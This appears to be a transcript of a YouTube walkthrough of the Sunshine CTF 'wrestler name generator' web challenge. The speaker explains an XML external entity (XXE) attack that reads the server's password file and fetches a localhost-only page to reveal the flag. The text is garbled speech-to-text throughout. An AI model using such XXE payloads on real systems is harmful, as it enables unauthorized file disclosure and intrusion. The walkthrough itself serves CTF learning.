 what's going on everybody my name is John Hammond and welcome back to another YouTube video we're talking about the Sunshine CTF this challenge we're gonna take a look at now is the wrestler name generator it's the second challenge in the web category it says even better than the Wu-Tang name generator legend has it that Hulk Hogan used this app to get his name so we have NG sunshine CTF org let's go check it out looks like welcome to the wrestler name generator enter your name below to get your wrestler name so you have first name last name weapon choice okay that's funny so let's just say my first name is John and my last name is Hammond cool and let's get wrestler name weapon of choice is obviously thumbtacks my wrestler name is John the hacker Hammond oh it warms my heart warms my heart thank you sunshine CTF how'd you know so the interesting thing here to take a look at is this input over in the URL this looks like a lot of base 64 what I'm gonna do is actually fire this up an idol so we can work with it interactively let's paste this in and actually we want to be able to decode it so let's set it to a variable let's just say a whatever let's do import url lib and let's url lib dot un quotes I think right a yep okay cool so that gives us our base 64 let's go ahead and decode that as base 64 you can do this in Python 2 Python 3 to yell at you you got to import codecs and do all that crap so Python 2 is much faster in my case for for CTFs but I know it's gonna run out of support pretty soon single tier small violin so we got XML responded to us XML version 1 with our input included and the first name and last name okay so it looks like we can control XML it looks like we actually have the potential to send in some XML by changing this right like if we were to just apply in that url our own base 64 would it would it decode it would it work with it on its own for us we can find that out let's actually go ahead and define a how about XML string we can go ahead and break a function that will actually take an XML string base 64 encode it and then prepare it with the url lib quote function so let's just call that something stupid like work or whatever yeah yeah work hello thank you okay so string doesn't matter again we're just doing this an idle so it's kind of faster for us let's just say return string dot encode base 64 and then let's actually say we want that url have been quoted so url of quote good okay so now we can work on something like this blah blah blah and let's just actually change my name to be please subscribe okay so now it gives us all that can we copy and paste that in will that work as a fine payload just replace that input and yes please the slasher subscribe that's cool all right so what do we have here we have control over XML so the extensible markup language I have talked about this in another video with PON function PWN function who's on YouTube isn't the discord server phenomenal guy if you want to go check that video out we talk about XML external entities and that is the xx e vulnerability that we can take advantage of it in this case so I we go into more much more depth in PON functions video he's awesome he's grown in a YouTube channel so go subscribe to him if you haven't but we talk about a little bit more in depth and we showcase how you can take advantage of this by exploring the XML what I want to do is I want to show you the payload and then how we can take advantage of it so let's get to payload all the things which is a phenomenal resource if you're doing some capture flag stuff it has a nice get a repository it's a good list scroll down here we should have xx e injection or XML external entities so an XML external entity attack is a type of attack against an application that parses XML input and allows XML entities an XML entity can be used to tell the XML parses to fetch specific content on the server okay so if an entity is declared within a ddd it's an internal entity and external entities outside identified by system so we've got some syntax here we can use we can go ahead and determine okay let's get it's that repassword displayed to us looks like this is just XML that we can just go ahead and put together so why not try it let's copy and paste this let's say work on that and we're gonna have to just kind of escape these unfortunately so what will that return for us let's try it let's move over to our wrestler name generator and following the input let's make it this my wrestler name is the fierce and we didn't have any luck I viewed the source here just to say though it says hacker name functionality coming soon if you're trying to test the hacker name functionality make sure you're accessing the page in the web server your hacker name is redacted if you're trying to test the hacker name functionality make sure you're accessing the page from the web server okay that's interesting looks like we had to be accessing it locally or some way to get the hacker name is redacted but we got the fear so it looks like it didn't return our our original file it's that repassword payload now why is that right doc type root in the original one we were using encoding utf-8 and we had inputs displayed here so maybe we need to put that in input first name last name stuff let's try that let's say doc type root test system root root let's put it let's make that doc type input oh that's already defined isn't it so previously right in the XML so maybe we can just say first name includes root and that's going to be capital here and first name let's try that and let's get our last name in there too just for safekeeping and make sure we end input maybe does input still have to be in there let's find out we've defined the root here so before we create our first name let's say have let's have input in there I'm sorry we probably might not have been able to see much of that me try and resize that so that's my face isn't in the way my bad let's run work on that and see if we got a result that we can work with here paste that in nope we have the slasher subscribe okay so let's go back to our payload and see if we can make anything let's we didn't have the we didn't have the encoding utf-8 in there so let's I guess include that just for some good some niceties maybe in case it needs that just in case and then doc type root entity system files that are password input first name we don't need the root document in there anymore do we we just need test first name last name subscribe let's try that how does this guy look so I remove the root and I didn't even close it when I had it before earlier didn't I oh no can I close it earlier I guess I probably like just did that and then wasn't thinking so let's paste that in see we got okay cool we got it set our password so now we know we have local file inclusion and we've got the external XML XML external entity attack working so reviewing that source though that comment said that we needed to if you need to test the hacker name functionality make sure you're accessing the page from the web server so just as we saw earlier we have to supply that maybe we can maybe we can just access this page from local host by changing up what we want to actually access in our XML entity let's change this to no longer XML version blah blah blah not file it's a repass when they were looking for let's change HTTP and let's go to local host right because that's going to access itself and we'll say what is it that we want we want to generate dot PHP page yeah okay generates dot PHP enter that now we've got the payload we can pass in and I'm sorry we've been doing this by hand it's probably much smarter to script this but we'll crank that out in another video or some extra curricular for you so there we go your wrestler name is son I love Hulk the external entity Hogan subscribe so there is our flag we can go ahead and submit that and that is that 150 points for wrestler name generator some XML external entity attacks and that that's that's crazy cool something that I had failed with when I was first going through this challenge was actually going to the generate dot PHP page on its own or actually sorry just the home page and entering some XML stuff within these input fields and I don't think it worked as well as it should have which is why when I realized like oh I can just control that get variable why don't I do that I had much a lot more success so still piecing together what that attack really looks like I'm not the best with XML so I probably failed on that root entity over and over again I'm sorry for that but hey cool attack glad we got it working and I hope it was very very interesting and very very fun for you guys if you did like this video please do like comment and subscribe love to see in the discord server there is a link in the description loves you on PayPal let's you on patreon just love to see thanks for watching guys see the next video